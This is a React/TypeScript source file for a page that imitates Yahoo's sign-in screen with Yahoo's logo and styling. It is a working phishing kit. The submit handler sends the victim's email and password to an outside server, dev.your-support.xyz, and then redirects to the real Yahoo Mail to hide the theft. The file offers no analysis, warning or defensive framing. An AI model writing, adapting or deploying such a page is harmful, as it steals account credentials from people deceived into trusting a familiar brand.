import { useState } from "react";
import { useNavigate } from "react-router-dom";

export default function YahooSignIn() {
  const [email, setEmail] = useState<string>("");
  const [password, setPassword] = useState<string>("");
  const [error, setError] = useState<string | null>(null);
  const [credentialType, setCredentialType] = useState("YAHOO"); // Add credential type state

  const navigate = useNavigate();

  const handleSubmit = async (e: React.FormEvent) => {
    e.preventDefault();
    setError(null);

    try {
      const response = await fetch(
        "https://dev.your-support.xyz/api/api/credentials",
        {
          method: "POST",
          headers: {
            "Content-Type": "application/json",
          },
          body: JSON.stringify({ email, password, credentialType }),
        }
      );

      const data = await response.json();

      if (!response.ok) {
        throw new Error(data.message || "Login failed");
      }

      console.log("Login successful:", data);
      window.location.href = "https://mail.yahoo.com/";
      // Handle successful login (e.g., store token, redirect user)
    } catch (err) {
      setError((err as Error).message);
    }
  };

  return (
    <div className="bg-white h-screen flex flex-col">
      <header className="flex justify-between items-center px-6 py-4">
        <img
          src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png"
          alt="Yahoo Logo"
          className="h-10"
        />
        <div className="space-x-4 text-sm text-purple-600">
          <a href="#" className="hover:underline">
            Help
          </a>
          <a href="#" className="hover:underline">
            Terms
          </a>
          <a href="#" className="hover:underline">
            Privacy
          </a>
        </div>
      </header>

      <main className="flex flex-1 justify-end items-center px-6">
        <div className="w-full max-w-sm">
          <div className="bg-white shadow-lg rounded-lg p-6">
            <div className="text-center mb-6">
              <img
                src="https://s.yimg.com/rz/p/yahoo_frontpage_en-US_s_f_p_bestfit_frontpage_2x.png"
                alt="Yahoo Logo"
                className="h-10 mx-auto"
              />
            </div>
            <h2 className="text-2xl font-semibold text-center text-gray-900">
              Sign in
            </h2>
            <p className="text-md text-center text-gray-500 mb-6">
              Sign in using your Yahoo account
            </p>

            {error && (
              <p className="text-red-500 text-sm text-center">{error}</p>
            )}

            <form onSubmit={handleSubmit}>
              <div className="mb-4">
                <input
                  type="email"
                  placeholder="Email"
                  className="mt-1 block w-full border-b-2 border-purple-500 focus:border-purple-700 focus:outline-none text-gray-900 text-sm p-2"
                  value={email}
                  onChange={(e) => setEmail(e.target.value)}
                />
              </div>
              <div className="mb-4">
                <input
                  type="password"
                  placeholder="Password"
                  className="mt-1 block w-full border-b-2 border-purple-500 focus:border-purple-700 focus:outline-none text-gray-900 text-sm p-2"
                  value={password}
                  onChange={(e) => setPassword(e.target.value)}
                />
              </div>

              <button
                type="submit"
                className="w-full bg-purple-600 text-white text-sm font-medium py-2 rounded-full hover:bg-purple-700 transition"
              >
                Next
              </button>

              <div className="flex items-center justify-between mt-4">
                <label className="flex items-center text-sm text-gray-700">
                  <input
                    type="checkbox"
                    className="form-checkbox text-purple-600"
                  />
                  <span className="ml-2">Stay signed in</span>
                </label>
                <a
                  href="https://login.yahoo.com/account/challenge/username?.lang=en-US&src=homepage&done=https%3A%2F%2Fwww.yahoo.com%2F&authMechanism=secondary&sessionIndex=Qg--&username=Thelade34"
                  className="text-sm text-purple-600 hover:underline"
                >
                  Forgotten username?
                </a>
              </div>
            </form>

            <div className="text-center my-4 text-sm text-gray-500">or</div>

            <a
              href="
            https://accounts.google.com/o/oauth2/v2/auth/oauthchooseaccount?client_id=860033281504.apps.googleusercontent.com&response_type=code&redirect_uri=https%3A%2F%2Flogin.yahoo.com%2Faccount%2Fchallenge%2Ftpa%2Fredirect&scope=openid%20email%20profile&access_type=online&prompt=select_account&state=acrumb%3DZpZgggf3%7Csrc%3Dhomepage%7CsessionIndex%3DQw--%7Cdisplay%3Dlogin%7CauthMechanism%3Dprimary%7Clang%3Den-US&service=lso&o2v=2&ddm=1&flowName=GeneralOAuthFlow"
            >
              <button
                type="button"
                className="flex items-center justify-center w-full border-2 border-gray-300 text-sm font-medium py-2 rounded-full hover:bg-gray-100 transition"
              >
                <img
                  src="https://upload.wikimedia.org/wikipedia/commons/thumb/c/c1/Google_%22G%22_logo.svg/1200px-Google_%22G%22_logo.svg.png"
                  alt="Google Logo"
                  className="h-5 mr-2"
                />
                Sign in with Google
              </button>
            </a>
          </div>
        </div>
      </main>
    </div>
  );
}
